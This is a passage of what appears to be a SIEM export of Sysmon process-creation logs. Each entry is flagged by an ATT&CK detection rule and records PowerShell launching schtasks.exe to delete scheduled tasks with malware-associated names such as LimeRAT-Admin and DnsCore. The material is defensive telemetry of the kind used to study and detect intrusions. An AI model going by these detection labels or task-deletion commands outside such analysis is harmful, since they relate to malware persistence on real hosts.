Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.472",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.207 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-001047c81e00} +ProcessId: 8060 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.209885900Z"",""eventRecordID"":""2526"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.207\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-001047c81e00}\r\nProcessId: 8060\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.207"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-001047c81e00}"",""processId"":""8060"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.445",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.186 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010a5c61e00} +ProcessId: 3812 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.188257100Z"",""eventRecordID"":""2525"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.186\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010a5c61e00}\r\nProcessId: 3812\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.186"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-0010a5c61e00}"",""processId"":""3812"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.416",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.162 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010c9c41e00} +ProcessId: 516 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.164209800Z"",""eventRecordID"":""2524"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.162\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010c9c41e00}\r\nProcessId: 516\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.162"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-0010c9c41e00}"",""processId"":""516"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.403",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.142 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010d2c21e00} +ProcessId: 6324 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.144667500Z"",""eventRecordID"":""2523"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.142\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010d2c21e00}\r\nProcessId: 6324\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.142"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-0010d2c21e00}"",""processId"":""6324"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.384",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.120 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010e2c01e00} +ProcessId: 7900 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.122434700Z"",""eventRecordID"":""2522"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.120\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010e2c01e00}\r\nProcessId: 7900\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.120"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-0010e2c01e00}"",""processId"":""7900"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.379",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.097 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-001003bf1e00} +ProcessId: 6636 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.100026500Z"",""eventRecordID"":""2521"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.097\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-001003bf1e00}\r\nProcessId: 6636\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.097"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-001003bf1e00}"",""processId"":""6636"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 